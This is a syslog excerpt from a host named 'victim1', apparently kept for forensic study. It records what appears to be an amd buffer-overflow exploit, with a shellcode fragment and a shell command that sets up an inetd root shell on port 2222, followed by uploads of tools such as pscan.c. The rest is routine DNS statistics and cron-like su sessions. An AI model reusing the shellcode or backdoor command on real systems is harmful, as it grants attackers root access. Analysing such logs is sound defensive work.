Jan 15 18:21:59 victim1 named[385]: XSTATS 947931719 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 18:50:08 victim1 
Jan 15 18:50:08 victim1 syslogd: Cannot glue message parts together
Jan 15 18:50:08 victim1 27>Jan 15 18:50:08 amd[479]: amq requested mount of ë(^^^P‰^^ƒĂ^H‰^^DƒĂ^C‰^^Hƒë^K^N‰Ę3Ŕ‰F^LˆF^WˆF^Z°^K̀čÓ˙˙˙18 Jan 1998--str/bin/sh(-c)/bin/echo '2222        stream  tcp     nowait  root    /bin/sh s
Jan 15 18:50:08 victim1 p/h;/usr/sbin/inetd /tmp/h &#Ňň˙żŇň˙ż^C
Jan 15 19:01:01 victim1 PAM_pwdb[25370]: (su) session opened for user news by (uid=0)
Jan 15 19:01:02 victim1 PAM_pwdb[25370]: (su) session closed for user news
Jan 15 19:05:22 victim1 rz[25410]: [root] amdex/ZMODEM: 12716 Bytes, 3999 BPS
Jan 15 19:05:24 victim1 rz[25410]: [root] pscan.c/ZMODEM: 4805 Bytes, 3759 BPS
Jan 15 19:09:46 victim1 rz[25467]: [root] ben.c/ZMODEM: 1536 Bytes, 1972 BPS
Jan 15 19:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 19:21:59 victim1 named[385]: USAGE 947935319 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 15 19:21:59 victim1 named[385]: NSTATS 947935319 944119308
Jan 15 19:21:59 victim1 named[385]: XSTATS 947935319 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 20:01:01 victim1 PAM_pwdb[27357]: (su) session opened for user news by (uid=0)
Jan 15 20:01:02 victim1 PAM_pwdb[27357]: (su) session closed for user news
Jan 15 20:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 20:21:59 victim1 named[385]: USAGE 947938919 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 15 20:21:59 victim1 named[385]: NSTATS 947938919 944119308
Jan 15 20:21:59 victim1 named[385]: XSTATS 947938919 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 21:01:00 victim1 PAM_pwdb[27417]: (su) session opened for user news by (uid=0)
Jan 15 21:01:01 victim1 PAM_pwdb[27417]: (su) session closed for user news
Jan 15 21:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 21:21:59 victim1 named[385]: USAGE 947942519 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 15 21:21:59 victim1 named[385]: NSTATS 947942519 944119308
Jan 15 21:21:59 victim1 named[385]: XSTATS 947942519 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 22:01:00 victim1 PAM_pwdb[27477]: (su) session opened for user news by (uid=0)
Jan 15 22:01:01 victim1 PAM_pwdb[27477]: (su) session closed for user news
Jan 15 22:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 22:21:59 victim1 named[385]: USAGE 947946119 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 15 22:21:59 victim1 named[385]: NSTATS 947946119 944119308
Jan 15 22:21:59 victim1 named[385]: XSTATS 947946119 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 15 23:01:01 victim1 PAM_pwdb[27536]: (su) session opened for user news by (uid=0)
Jan 15 23:01:01 victim1 PAM_pwdb[27536]: (su) session closed for user news
Jan 15 23:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 15 23:22:00 victim1 named[385]: USAGE 947949720 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 15 23:22:00 victim1 named[385]: NSTATS 947949720 944119308
Jan 15 23:22:00 victim1 named[385]: XSTATS 947949720 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 16 00:01:00 victim1 PAM_pwdb[27595]: (su) session opened for user news by (uid=0)
Jan 16 00:01:01 victim1 PAM_pwdb[27595]: (su) session closed for user news
Jan 16 00:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 16 00:22:00 victim1 named[385]: USAGE 947953320 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 16 00:22:00 victim1 named[385]: NSTATS 947953320 944119308
Jan 16 00:22:00 victim1 named[385]: XSTATS 947953320 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 16 01:01:00 victim1 PAM_pwdb[27654]: (su) session opened for user news by (uid=0)
Jan 16 01:01:01 victim1 PAM_pwdb[27654]: (su) session closed for user news
Jan 16 01:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 16 01:22:00 victim1 named[385]: USAGE 947956920 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 16 01:22:00 victim1 named[385]: NSTATS 947956920 944119308
Jan 16 01:22:00 victim1 named[385]: XSTATS 947956920 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 16 02:01:00 victim1 PAM_pwdb[27713]: (su) session opened for user news by (uid=0)
Jan 16 02:01:01 victim1 PAM_pwdb[27713]: (su) session closed for user news
Jan 16 02:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 16 02:22:00 victim1 named[385]: USAGE 947960520 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 16 02:22:00 victim1 named[385]: NSTATS 947960520 944119308
Jan 16 02:22:00 victim1 named[385]: XSTATS 947960520 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 16 03:01:00 victim1 PAM_pwdb[27772]: (su) session opened for user news by (uid=0)
Jan 16 03:01:01 victim1 PAM_pwdb[27772]: (su) session closed for user news
Jan 16 03:21:59 victim1 named[385]: Cleaned cache of 0 RRs
Jan 16 03:22:00 victim1 named[385]: USAGE 947964120 944119308 CPU=1.01u/3.32s CHILDCPU=0u/0s
Jan 16 03:22:00 victim1 named[385]: NSTATS 947964120 944119308
Jan 16 03:22:00 victim1 named[385]: XSTATS 947964120 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 16 04:01:00 victim1 PAM_pwdb[27831]: (su) session opened for user news by (uid=0)
Jan 16 04:01:03 victim1 PAM_pwdb[27831]: (su) session closed for user news
Jan 16 04:02:00 victim1 PAM_pwdb[27871]: (su) session opened for user news by (uid=0)
Jan 16 04:03:09 victim1 PAM_pwdb[27871]: (su) session closed for user news